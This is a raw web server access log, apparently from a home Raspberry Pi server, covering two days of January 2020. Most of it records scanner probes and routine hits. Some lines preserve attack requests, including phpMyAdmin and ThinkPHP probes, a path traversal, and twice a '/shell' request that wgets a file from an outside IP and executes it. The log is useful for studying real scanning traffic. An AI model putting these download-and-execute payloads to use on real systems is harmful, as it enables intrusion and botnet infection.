Sat Jan 18 06:25:06 MST 2020 06:25:06 up 29 days, 21:16, 1 user, load average: 0.35, 0.26, 0.36 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 30days 39:02 5.07s /usr/bin/lxsession -s LXDE-pi -e LXDE 185.64.88.190 - - [18/Jan/2020:13:31:32 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 201.156.46.196 - - [18/Jan/2020:13:52:09 +0000] "GET / HTTP/1.1" 400 0 "" "" 177.55.91.140 - - [18/Jan/2020:13:57:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 172.105.11.111 - - [18/Jan/2020:15:06:50 +0000] "GET / HTTP/1.0" 200 25000 "" "" 61.153.237.123 - - [18/Jan/2020:15:10:12 +0000] "GET /manager/html HTTP/1.1" 404 0 "" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705" 61.153.237.123 - - [18/Jan/2020:15:10:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 61.153.237.123 - - [18/Jan/2020:15:10:14 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.105.11.111 - - [18/Jan/2020:15:21:30 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" 51.79.101.221 - - [18/Jan/2020:16:14:07 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.79.101.221 - - [18/Jan/2020:16:14:07 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 189.228.180.14 - - [18/Jan/2020:17:06:00 +0000] "GET / HTTP/1.1" 400 0 "" "" 185.199.81.121 - - [18/Jan/2020:17:07:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 89.110.57.185 - - [18/Jan/2020:17:22:41 +0000] "GET / HTTP/1.1" 400 0 "" "" 5.236.171.218 - - [18/Jan/2020:17:29:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 181.28.141.218 - - [18/Jan/2020:17:34:01 +0000] "GET / HTTP/1.1" 400 0 "" "" 51.254.59.113 - - [18/Jan/2020:19:50:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:35 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:36 +0000] "GET /ac0xl/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:36 +0000] "GET /delinquent-accounts/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:37 +0000] "GET /documents/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:37 +0000] "GET /downloads/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:38 +0000] "GET /freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:38 +0000] "GET /memes/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:39 +0000] "GET /music/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:40 +0000] "GET /pictures/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:40 +0000] "GET /va/ HTTP/1.1" 401 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:41 +0000] "GET /videos/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:41 +0000] "GET /ac0xl/ac0xl/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:42 +0000] "GET /ac0xl/ac0xl/Dont-Be-Evil/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:42 +0000] "GET /ac0xl/ac0xl/illuminati/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:43 +0000] "GET /ac0xl/ac0xl/logs/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:43 +0000] "GET /ac0xl/ac0xl/www/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:44 +0000] "GET /delinquent-accounts/delinquent-accounts/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:44 +0000] "GET /delinquent-accounts/delinquent-accounts/I-Camp-RV-Park-Campground-Green-River-Utah-84525/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:45 +0000] "GET /documents/documents/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:45 +0000] "GET /downloads/downloads/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:46 +0000] "GET /freedom/freedom/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:46 +0000] "GET /freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:47 +0000] "GET /freedom/freedom/freedom-2020-01-08/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:47 +0000] "GET /memes/memes/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:48 +0000] "GET /music/music/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:48 +0000] "GET /pictures/pictures/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:49 +0000] "GET /videos/videos/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:49 +0000] "GET /freedom/freedom/freedom/freedom/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 51.254.59.113 - - [18/Jan/2020:19:50:50 +0000] "GET /freedom/freedom/freedom/freedom/thttpd-extras/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 85.102.236.113 - - [18/Jan/2020:19:51:13 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 85.102.236.113 - - [18/Jan/2020:19:51:15 +0000] "GET / HTTP/1.1" 400 0 "" "" 34.235.118.137 - - [18/Jan/2020:20:01:58 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.101.0.209 - - [18/Jan/2020:20:24:15 +0000] "PUT /krrzzz.jsp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 5.101.0.209 - - [18/Jan/2020:20:24:15 +0000] "GET /krrzzz.jsp HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 201.48.191.129 - - [18/Jan/2020:20:24:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 189.146.230.133 - - [18/Jan/2020:20:45:37 +0000] "GET / HTTP/1.1" 400 0 "" "" 69.162.126.238 - - [18/Jan/2020:21:39:55 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 69.162.126.238 - - [18/Jan/2020:21:39:55 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 37.205.159.206 - - [18/Jan/2020:21:40:50 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 86.57.173.146 - - [18/Jan/2020:21:51:21 +0000] "GET / HTTP/1.1" 400 0 "" "" 61.144.244.75 - - [18/Jan/2020:22:10:50 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 61.144.244.75 - - [18/Jan/2020:22:10:53 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:54 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:54 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:55 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:55 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:56 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:56 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:57 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 61.144.244.75 - - [18/Jan/2020:22:10:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 69.162.106.70 - - [18/Jan/2020:22:53:32 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 0 "" "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 2.112.35.46 - - [18/Jan/2020:22:58:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 221.199.188.68 - - [19/Jan/2020:00:53:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 221.199.188.68 - - [19/Jan/2020:00:53:07 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:07 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:08 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:08 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:09 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:09 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:10 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:10 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 221.199.188.68 - - [19/Jan/2020:00:53:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 5.95.50.163 - - [19/Jan/2020:01:12:55 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 117.157.15.27 - - [19/Jan/2020:01:13:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 51.91.150.146 - - [19/Jan/2020:01:39:24 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 162.250.19.7 - - [19/Jan/2020:02:38:14 +0000] "GET /ac0xl/logs/ HTTP/1.1" 200 25000 "" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 162.250.19.7 - - [19/Jan/2020:02:38:24 +0000] "GET /ac0xl/logs/2020.01.18 HTTP/1.1" 200 15809 "http://162.250.19.7/ac0xl/logs/" "Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.36 (KHTML, like Gecko) Raspbian Chromium/72.0.3626.121 Chrome/72.0.3626.121 Safari/537.36" 93.126.29.218 - - [19/Jan/2020:02:45:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 223.204.65.249 - - [19/Jan/2020:03:52:13 +0000] "GET / HTTP/1.1" 400 0 "" "" 120.78.213.209 - - [19/Jan/2020:04:00:37 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 80.16.11.78 - - [19/Jan/2020:04:01:27 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 97.127.109.132 - - [19/Jan/2020:04:14:00 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 97.127.109.132 - - [19/Jan/2020:04:14:00 +0000] "GET / HTTP/1.1" 200 25000 "" "" 72.27.95.89 - - [19/Jan/2020:05:17:32 +0000] "GET / HTTP/1.1" 400 0 "" "" 72.27.95.89 - - [19/Jan/2020:05:18:21 +0000] "GET / HTTP/1.1" 400 0 "" "" 72.27.95.89 - - [19/Jan/2020:05:18:27 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 51.79.29.248 - - [19/Jan/2020:05:25:59 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.79.29.248 - - [19/Jan/2020:05:25:59 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 170.80.36.3 - - [19/Jan/2020:06:22:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 107.167.73.76 - - [19/Jan/2020:06:25:03 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 107.167.73.76 - - [19/Jan/2020:06:25:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 107.167.73.76 - - [19/Jan/2020:06:25:03 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 107.167.73.76 - - [19/Jan/2020:06:25:03 +0000] "POST /Admin0713faa2/Login.php HTTP/1.1" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)" 45.56.78.64 - - [19/Jan/2020:07:12:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 185.202.130.8 - - [19/Jan/2020:07:15:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 95.70.231.55 - - [19/Jan/2020:07:15:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 58.246.21.186 - - [19/Jan/2020:07:23:55 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 222.186.19.221 - - [19/Jan/2020:07:45:19 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 36.32.3.9 - - [19/Jan/2020:07:45:29 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 171.36.129.57 - - [19/Jan/2020:07:45:29 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36" 182.138.158.246 - - [19/Jan/2020:07:48:02 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 60.216.139.111 - - [19/Jan/2020:07:48:04 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 222.79.48.195 - - [19/Jan/2020:07:48:05 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 175.184.165.85 - - [19/Jan/2020:07:48:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 117.14.152.80 - - [19/Jan/2020:07:48:07 +0000] "UNKNOWN HTTP/1.1" 400 0 "" "" 220.200.156.38 - - [19/Jan/2020:07:48:09 +0000] "GET /english/ HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 182.138.163.31 - - [19/Jan/2020:07:48:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" 213.222.56.130 - - [19/Jan/2020:08:07:29 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 213.222.56.130 - - [19/Jan/2020:08:07:30 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 213.222.56.130 - - [19/Jan/2020:08:07:31 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 213.222.56.130 - - [19/Jan/2020:08:07:31 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 213.222.56.130 - - [19/Jan/2020:08:07:31 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 213.222.56.130 - - [19/Jan/2020:08:07:32 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 181.174.60.83 - - [19/Jan/2020:08:08:12 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 178.168.92.231 - - [19/Jan/2020:09:17:01 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 178.93.31.17 - - [19/Jan/2020:09:26:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 51.91.150.146 - - [19/Jan/2020:09:57:02 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:02 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:03 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:03 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:03 +0000] "GET /admin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:04 +0000] "GET /mysql/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:04 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 51.91.150.146 - - [19/Jan/2020:09:57:05 +0000] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 0 "" "ZmEu" 83.174.144.103 - - [19/Jan/2020:10:03:59 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 185.109.22.147 - - [19/Jan/2020:10:13:17 +0000] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 0 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 128.14.133.58 - - [19/Jan/2020:10:20:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 51.79.29.248 - - [19/Jan/2020:10:22:58 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 51.79.29.248 - - [19/Jan/2020:10:22:58 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 83.97.20.33 - - [19/Jan/2020:11:29:11 +0000] "GET / HTTP/1.0" 200 25000 "" "" 188.19.168.232 - - [19/Jan/2020:12:02:47 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" Sun Jan 19 06:25:05 MST 2020 06:25:05 up 30 days, 21:16, 1 user, load average: 0.47, 0.35, 0.64 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Dec19 31days 40:38 5.54s /usr/bin/lxsession -s LXDE-pi -e LXDE